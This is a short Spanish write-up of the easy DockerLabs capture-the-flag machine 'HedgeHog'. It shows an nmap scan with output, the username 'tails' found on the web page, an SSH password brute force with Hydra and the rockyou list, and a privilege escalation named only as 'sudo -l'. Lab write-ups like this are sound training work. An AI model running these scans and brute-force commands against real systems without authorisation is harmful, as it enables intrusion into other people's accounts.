WriteUp de la máquina HedgeHog
Este WriteUp documenta la solución para la máquina “HedgeHog” de DockerLabs. A través de varias etapas de reconocimiento, explotación y elevación de privilegios, el objetivo es obtener acceso a la máquina y escalar privilegios para convertirnos en el usuario root.
Resumen:
- Nombre: HedgeHog
- Dificultad: Facil
- Autor: AnkbNikas
- Sistema Operativo: Linux
- Enlace: DockerLabs
Progreso del WriteUp
Reconocimiento inicial
El primer paso consiste en iniciar la máquina. Esto se puede lograr ejecutando el siguiente comando, una vez que se haya descargado la máquina:
sudo bash auto_deploy.sh hedgehog.tar
Una vez iniciada la máquina, el script de despliegue me proporciona la dirección IP de la máquina, por lo que procedo a realizar un escaneo de puertos para identificar los servicios disponibles:
nmap 172.17.0.3
El resultado del escaneo de puertos fue:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-03 12:20 UTC
Nmap scan report for 172.17.0.3
Host is up (0.000015s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: B6:7A:40:AD:21:E9 (Unknown)
Resultado: El escaneo de puertos reveló un servicio importante:
- Puerto 22: Servicio SSH abierto.
- Puerto 80: Servicio HTTP.
Usuario tails
Al observar que se encuentra el servicio web activo en el puerto 80, procedo a visitarlo y me encuentro el usuario: *tails, así que aplicamos fuerza bruta al servicio ssh.
Usando Hydra
Luego de algunos problemas iniciales con rockyou, logro obtener las credenciales del usuario:
hydra -l tails -P rockyou ssh://172.17.0.3
Escalando privilegios
Por ser una maquina de nivel facil, se ha logrado escalar privilegios utilizando:
sudo -l
Aprendizaje
La máquina HedgeHog por ser de nivel muy facil, fue bastante intiutivo poder resolverla.
Comandos
- Despliegue de la máquina:
sudo bash auto_deploy.sh hedgehog.tar - Escaneo de puertos:
nmap 172.17.0.3 - Fuerza bruta SSH con Hydra:
hydra -l tails -P rockyou ssh://172.17.0.3 - Elevar privilegios:
sudo -l